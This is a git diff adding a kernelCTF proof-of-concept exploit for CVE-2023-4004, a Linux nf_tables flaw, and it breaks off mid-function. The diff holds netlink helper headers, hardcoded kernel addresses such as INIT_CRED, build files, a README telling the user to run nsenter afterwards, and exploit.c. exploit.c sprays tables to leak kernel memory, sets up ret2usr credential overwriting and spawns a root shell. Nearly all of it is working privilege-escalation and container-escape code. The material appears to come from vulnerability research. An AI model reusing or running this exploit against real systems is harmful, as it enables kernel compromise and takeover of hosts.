msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, set_name); + + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Flush set\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/spec.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/spec.h new file mode 100644 index 00000000..5b4fe427 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/spec.h @@ -0,0 +1,2 @@ +#define INIT_CRED 0xFFFFFFFF83676800 +#define MODULE_CT_EXPECT_OBJ_TYPE_ADDR 0xFFFFFFFF83962580 diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/table.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/table.h new file mode 100644 index 00000000..a623f956 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/table.h @@ -0,0 +1,197 @@ +void new_table(struct nl_sock * socket, char *name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWTABLE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + nla_put_string(msg2, NFTA_TABLE_NAME, name); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create table\n"); + } +} + +void new_table_with_udata(struct nl_sock * socket, char *name,char *udata, int len){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWTABLE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + nla_put_string(msg2, NFTA_TABLE_NAME, name); + nla_put(msg2,NFTA_TABLE_USERDATA,len,udata); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create table\n"); + } +} + +void get_table(struct nl_sock * socket, char *name){ + //init msg + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + nfnlmsg_put( + msg, + NL_AUTO_PID, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_SUBSYS_NFTABLES, //SUBSYS + NFT_MSG_GETTABLE, // TYPE + NLM_F_REQUEST, //NLM_F_ECHO + 2, //FAMILY + 0 //RES_ID + ); + //init msg + nla_put_string(msg, NFTA_TABLE_NAME, name); + + int res = nl_send_auto(socket, msg); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Get table %s\n",name); + } +} +void del_table(struct nl_sock * socket, char *table_name){ + + struct nl_msg * msg = nlmsg_alloc(); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELTABLE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + + nla_put_string(msg2, NFTA_TABLE_NAME, table_name); + + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Delete object %s\n",obj_name); + } + +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/Makefile b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/Makefile new file mode 100644 index 00000000..e2a6e2ce --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/Makefile @@ -0,0 +1,9 @@ +exploit: + gcc -o exploit exploit.c -I/usr/include/libnl3 -lnl-nf-3 -lnl-route-3 -lnl-3 -static +prerequisites: + sudo apt-get install libnl-nf-3-dev +run: + ./exploit + +clean: + rm exploit diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/README b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/README new file mode 100644 index 00000000..4945bb0b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/README @@ -0,0 +1,2 @@ +Exploit for kctf Migrate 6.1-v2 +Run command "nsenter --target 1 -m -p" after run the poc. diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/chain.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/chain.h new file mode 100644 index 00000000..4245eb47 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/chain.h @@ -0,0 +1,56 @@ +void new_chain(struct nl_sock * socket, char *table_name, char *chain_name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWCHAIN),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + nla_put_string(msg2, NFTA_CHAIN_TABLE, table_name); + nla_put_string(msg2, NFTA_CHAIN_NAME, chain_name); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + printf("Create chain %s\n",chain_name); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/exploit b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/exploit new file mode 100755 index 00000000..08f9fe0a Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/exploit.c b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/exploit.c new file mode 100644 index 00000000..beb4654e --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/exploit.c @@ -0,0 +1,363 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "obj.h" +#include "setelem.h" +#include "table.h" +#include "set.h" +#include "rule.h" +#include "chain.h" +#include "spec.h" +#define THREAD_MAX_NUM 100 +#define SET_TABLE "set-table" +#define OBJ_FOR_REF "obj-for-ref" +#define OBJ_TABLE "obj-table" + +char *leak_obj=NULL; +char *target_table=NULL; +char *leak_data=NULL; +int ct_expect_obj_num = 0; +int table_num = 0; + +unsigned long user_cs,user_ss,user_rsp,user_rflags; +uint64_t kernel_off, module_base, type_addr, prepare_kernel_cred, commit_creds; +uint64_t set_num = 0; +static void save_state() { + asm( + "movq %%cs, %0\n" + "movq %%ss, %1\n" + "movq %%rsp, %2\n" + "pushfq\n" + "popq %3\n" + : "=r" (user_cs), "=r" (user_ss), "=r" (user_rsp),"=r" (user_rflags) : : "memory"); +} + + +void shell(){ + printf("ret2usr success! uid : %d\n",getuid()); + + char *args[] = {"/bin/sh", "-i", NULL}; + //char *args[] = {"/bin/sh", "-c", "nsenter --target 1 -m -p;/bin/bash",NULL}; + execve(args[0], args, NULL); +} + +int nl_callback_find_target_table(struct nl_msg* recv_msg, void* arg) +{ + + struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg); + struct nlattr * tb_msg[NFTA_TABLE_MAX+1]; + memset(tb_msg,0,NFTA_TABLE_MAX * 8); + + if (ret_hdr->nlmsg_type == NLMSG_ERROR) { + //fprintf(stderr, "Received NLMSG_ERROR message!\n"); + return NL_STOP; + } + + struct nlattr *attr = (void *)ret_hdr + nlmsg_total_size(sizeof(struct nfgenmsg)); + int attrlen = ret_hdr->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg)); + nla_parse(tb_msg, NFTA_TABLE_MAX, attr, attrlen, NULL); + char * table_name=NULL; + if (tb_msg[NFTA_TABLE_NAME]) { + table_name = nla_get_string(tb_msg[NFTA_TABLE_NAME]); + //printf("Get table: '%s'\n", table_name ); + } + if (tb_msg[NFTA_TABLE_USERDATA]){ + uint64_t * val = malloc(nla_len(tb_msg[NFTA_TABLE_USERDATA])); + nla_memcpy(val, tb_msg[NFTA_TABLE_USERDATA], nla_len(tb_msg[NFTA_TABLE_USERDATA])); + //printf("data[0] = %lx\n", val[0]); + if((val[0]&0xfffffffffffff000)!= 0x4c00000000000000 && val[0] != 0){ + printf("Get table: '%s'\n", table_name ); + printf("data[0] = %lx\n", val[0]); + leak_obj = (char *)val; + target_table = malloc(strlen(table_name)+1); + strcpy(target_table,table_name); + leak_data = (char *)val; + } + } + return NL_OK; +} + + +int nl_callback_for_obj(struct nl_msg* recv_msg, void* arg) +{ + + struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg); + struct nlattr * tb_msg[NFTA_OBJ_MAX+1]; + memset(tb_msg,0,NFTA_OBJ_MAX * 8); + + if (ret_hdr->nlmsg_type == NLMSG_ERROR) { + //fprintf(stderr, "Received NLMSG_ERROR message!\n"); + return NL_STOP; + } + + struct nlattr *attr = (void *)ret_hdr + nlmsg_total_size(sizeof(struct nfgenmsg)); + int attrlen = ret_hdr->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg)); + nla_parse(tb_msg, NFTA_OBJ_MAX, attr, attrlen, NULL); + char * obj_name=NULL; + if (tb_msg[NFTA_OBJ_NAME]) { + obj_name = nla_get_string(tb_msg[NFTA_OBJ_NAME]); + printf("Get obj: '%s'\n", obj_name ); + } + if (tb_msg[NFTA_OBJ_USERDATA]){ + uint64_t * val = malloc(nla_len(tb_msg[NFTA_OBJ_USERDATA])); + nla_memcpy(val, tb_msg[NFTA_OBJ_USERDATA], nla_len(tb_msg[NFTA_OBJ_USERDATA])); + printf("data[0] = %lx\n", val[0]); + leak_data = (char *)val; + } + return NL_OK; +} + + +int setup_sandbox(void) { + if (unshare(CLONE_NEWUSER) < 0) { + perror("[-] unshare(CLONE_NEWUSER)"); + return -1; + } + if (unshare(CLONE_NEWNET) < 0) { + perror("[-] unshare(CLONE_NEWNET)"); + return -1; + } + return 0; +} + +void spray_tables(struct nl_sock * socket, int len, char *udata, int size){ + char *tmp = malloc(0x100); + memset(tmp,0,0x100); + int i; + for(i=0;infgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + char *a = malloc(0x100); + memset(a,0x41,0x100); + + nla_put_u8(data, NFTA_CT_EXPECT_L4PROTO, 0x41); + nla_put_u16(data, NFTA_CT_EXPECT_DPORT, 0x4141); + nla_put_u32(data, NFTA_CT_EXPECT_TIMEOUT, 0x41414141); + nla_put_u8(data, NFTA_CT_EXPECT_SIZE, 0x41); + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_CT_EXPECT)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object tunnel %s\n",obj_name); + } +} +void new_obj_tunnel(struct nl_sock * socket, char *table_name, char *obj_name, void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + struct nl_msg *ip = nlmsg_alloc(); + struct nl_msg *opts = nlmsg_alloc(); + struct nl_msg *opts_gen = nlmsg_alloc(); + //init ip + char *a = malloc(0x100); + memset(a,0x41,0x100); + nla_put_u32(ip, NFTA_TUNNEL_KEY_IP_DST, 0x41414141); + + nla_put_u16(opts_gen, NFTA_TUNNEL_KEY_GENEVE_CLASS, 0x10); + nla_put(opts_gen, NFTA_TUNNEL_KEY_GENEVE_DATA, 0x80, a); + nla_put_u8(opts_gen, NFTA_TUNNEL_KEY_GENEVE_TYPE, 0x10); + + nla_put_nested(opts, NFTA_TUNNEL_KEY_OPTS_GENEVE|NLA_F_NESTED, opts_gen); + //struct nlattr *nla = nla_reserve(opts, NFTA_TUNNEL_KEY_OPTS_GENEVE, nlmsg_datalen(opts_gen->nm_nlh)); + //nla->nla_type |= NLA_F_NESTED; + //memcpy(nla_data(nla), nlmsg_data(opts_gen->nm_nlh),nlmsg_datalen(opts_gen->nm_nlh)); + + nla_put_u32(data, NFTA_TUNNEL_KEY_ID, 0x41414141); + nla_put_nested(data, NFTA_TUNNEL_KEY_IP, ip); + nla_put_nested(data, NFTA_TUNNEL_KEY_OPTS, opts); + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_TUNNEL)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object tunnel %s\n",obj_name); + } +} + +void new_obj_quota(struct nl_sock * socket, char *table_name, char *obj_name,void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + //init ip + nla_put_u64(data, NFTA_QUOTA_BYTES, 0x100); + + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_QUOTA)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + 